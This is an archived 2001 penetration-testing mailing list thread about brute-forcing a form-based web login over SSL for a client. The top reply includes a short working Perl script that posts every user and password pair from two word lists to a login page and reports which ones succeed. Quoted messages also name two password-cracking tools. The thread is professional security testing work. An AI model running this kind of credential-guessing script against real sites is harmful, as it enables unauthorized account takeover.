It's done very simple by using perl Net::SSLeay something like this. Just an example: #!/usr/local/bin/perl use Net::SSLeay, qw(post_https make_form); open(USR, "< users.txt") || die "Unable to open users file.\n"; open(PWD, "< passwd.txt") || die "Unable to open passwd file.\n"; while(<PWD>) { chop; $passwd[@passwd] = $_ } close(PWD); while(<USR>) { foreach $pwd(@passwd) { chop; ($page, $result, %headers) = post_https('www.victim.com', 443, '/login.cgi', '', make_form('login'=>$_, 'password'=>$pwd)); if ($page =~ "Login Successful") { print "$_:$pwd was correct\n" } } } close(USR); On Tue, 17 Apr 2001, Batten, Gerald wrote: > I'm not trying to crack the SSL session itself. I'm just trying to get an > idea of the quality of passwords the users are using for that site, but from > an external test only. > > The web server is not using the typical 'username/password' pop-up box, > they're using a dynamically generated form, which has a different URL every > time the page is brought up. The user enters their userid and password in > the form and clicks on 'submit' which uses the HTTP POST method. The > session is SSL-encrypted as well. The difficulty I am having is that short > of writing my own perl script (which I am desperately trying to avoid... > sorry, I don't like coding any more), none of the tools I have found can > brute-force a form-based login over SSL. I tried using sslproxy and stunnel > on NT/2000, but those ports lack some of the functionality I need. My next > step is to try and convince one of my Linux co-workers to run stunnel on > their system. > > Gerald. > > Note: Views expressed in this e-mail do not necessarily represent those of > my employer. > Note: Views expressed in this e-mail are not necessarily mine either. > > -----Original Message----- > From: John R. Sciandra [mailto:johnrsat_private] > Sent: Tuesday, April 17, 2001 1:37 PM > To: PEN-TESTat_private > Subject: Re: Web site password guessing over SSL > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Ok don't flame for being a bone head but let me pose a counter > question or two. > > I was under the impression that (typically) SSL is run a mode that > only encrypts the transport between the client and server. I think it > is possible to use SSL to restrict access to the web server by userid > in some modes but that generally is not how SSL is setup. > > If I understand correctly you are just trying to crack the web servers > challenge. I think that what happens with cracking the web servers > password is more of an end point dialog between the web server and the > client. So if you can establish your SSL session (as if you were > browsing the site) and are able to get the prompt for userid and > password that the web server presents, you should be in business. Did > I miss it? Do you have to do something extra with the SSL? > > If on the other hand you are trying to crack the actual SSL session > itself...I am not sure but doesn't that involve cracking RSA or > something? > > - -John > > - -----Original Message----- > From: Penetration Testers [mailto:PEN-TESTat_private]On Behalf > Of Joel Brown > Sent: Friday, April 13, 2001 10:52 AM > To: PEN-TESTat_private > Subject: Re: [PEN-TEST] Web site password guessing over SSL > > > ssl.cracker.exe at > http://neworder.box.sk/search.php3?srch=ssl+brute should work, > also check out ObiWan at > http://www.phenoelit.de/obiwan/ > > Joel > > >>Our client wants us to try to brute-force one of their public web > sites > that > >>is password-protected via a form-based login over SSL. > > -----BEGIN PGP SIGNATURE----- > Version: PGP for Personal Privacy 5.5.5 > > iQA/AwUBOtx/NX0lZ+LOrv8nEQJYcgCfX66o15M5e6q5dKMIz9Wb89qOszYAoJVa > 7wsHwn7aq3oCpCSE87BnrXXn > =jTZ8 > -----END PGP SIGNATURE----- >
This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 17:49:11 PDT